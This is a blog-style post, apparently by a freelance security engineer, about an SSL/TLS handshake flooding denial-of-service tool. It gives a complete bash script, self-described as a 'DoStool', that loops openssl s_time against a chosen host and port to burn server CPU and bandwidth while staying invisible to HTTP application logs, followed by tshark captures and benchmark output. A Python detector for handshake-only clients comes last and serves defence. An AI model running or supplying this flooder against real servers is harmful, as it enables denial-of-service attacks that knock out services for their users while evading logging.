We will take another look at a simple SSL negotiation flooder script that uses openssl.
In this approach we repeatedly ask for the SSL handshake and negotiation. These repeated requests raise the CPU and bandwidth used for the delivery of the cert and session setup.
Here's the script:
#!/bin/bash
#
#
#rev 1.0
# ssl negotiation generation & flooding via openssl and s_time
#
# SSL neg flooder DoStool
# Basically this tool loops the ssl neg and request no HTTP traffic from the host,
# so any HTTP application logs will not see any requests or L7 attacks
#
#
if [ ! $1 ]; then
echo " Usage : $0 < The #of requests to execute> <server or ip_address> <port> "
echo ""
echo "Example $0 10 1.1.1.1 443 "
echo ""
exit 1
fi
#
i="0"
#
###set -xv
COUNTER=$1
MAX=9999999
if (( $1 >= $MAX )) ; then
echo " "
echo "Please make a request range of $MAX or less"
echo " "
else
while [ $i -lt $COUNTER ] ;
do openssl s_time -connect $2:$3 -time 200 -nbio -new
echo " "
echo " Request # $i "
echo " "
i=$[$i + 1]
# let "COUNTER += 1"
#
done
fi
And here's what tshark will decode:
(output shortened)
2013-05-23 16:05:20.912039 127.0.0.1 -> 127.0.0.1 TLSv1 1055 Server Hello, Certificate, Server Key Exchange, Server Hello Done
2013-05-23 16:05:20.913222 127.0.0.1 -> 127.0.0.1 TLSv1 190 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message
2013-05-23 16:05:20.913813 127.0.0.1 -> 127.0.0.1 TLSv1 115 Change Cipher Spec, Encrypted Handshake Message
2013-05-23 16:05:20.915249 127.0.0.1 -> 127.0.0.1 TLSv1 1055 Server Hello, Certificate, Server Key Exchange, Server Hello Done
1806 packets captured
And at the conclusion of each request, we will get some benchmark numbers:
(output shortened)
ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt
55699 connections in 68.99s; 807.35 connections/user sec, bytes read 0
55699 connections in 201 real seconds, 0 bytes read per connection
Request # 0
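Because the application logs see nothing and every connection reads 0 bytes, the place to catch this pattern is the packet decode. The following is an added example, not part of the original post: it reads tshark summary lines in the layout shown above and flags clients that complete many full handshakes in a window without sending any Application Data. The function names, the 1-second window, the threshold of 3 and the sample addresses are assumptions made for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime

# tshark summary layout used on this page: date time src -> dst proto len info
LINE = re.compile(r"^(\S+ \S+)\s+(\S+)\s+->\s+(\S+)\s+(\S+)\s+(\d+)\s+(.*)$")
EPOCH = datetime(1970, 1, 1)

def handshake_only_clients(lines, window=1.0, threshold=3):
    """Map client IP -> peak handshakes per window, for clients that finish
    at least `threshold` full handshakes in one window and send no
    Application Data in that same window (threshold is an assumed value)."""
    stats = defaultdict(lambda: [0, 0])  # (client, bucket) -> [handshakes, app records]
    for line in lines:
        m = LINE.match(line.strip())
        if not m or not m.group(4).startswith(("TLS", "SSL")):
            continue
        when = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S.%f")
        bucket = int((when - EPOCH).total_seconds() // window)
        src, info = m.group(2), m.group(6)
        if "Client Key Exchange" in info:    # client's half of a full handshake
            stats[(src, bucket)][0] += 1
        elif "Application Data" in info:     # the session actually carried data
            stats[(src, bucket)][1] += 1
    flagged = {}
    for (client, _), (handshakes, app) in stats.items():
        if handshakes >= threshold and app == 0:
            flagged[client] = max(flagged.get(client, 0), handshakes)
    return flagged

def constructed_capture():
    """Constructed sample: .7 only handshakes, .9 handshakes once then sends data."""
    hs = ("2013-05-23 16:05:20.{:06d} {} -> 192.0.2.10 TLSv1 190 "
          "Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message")
    lines = [hs.format(i * 1000, "198.51.100.7") for i in range(1, 5)]
    lines.append(hs.format(500000, "198.51.100.9"))
    lines.append("2013-05-23 16:05:20.600000 198.51.100.9 -> 192.0.2.10 "
                 "TLSv1 300 Application Data")
    return lines

if __name__ == "__main__":
    print(handshake_only_clients(constructed_capture()))
```

The Client Key Exchange record is visible in the clear only for TLS 1.2 and earlier, which matches the TLSv1 capture above. The window and threshold need tuning against normal traffic for the server being watched.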
Ken Felix
Freelance Network/Security Engineer